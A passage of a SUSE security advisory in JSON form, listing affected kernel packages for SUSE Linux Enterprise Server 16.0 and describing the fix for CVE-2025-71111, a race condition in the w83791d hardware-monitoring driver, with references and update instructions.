"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
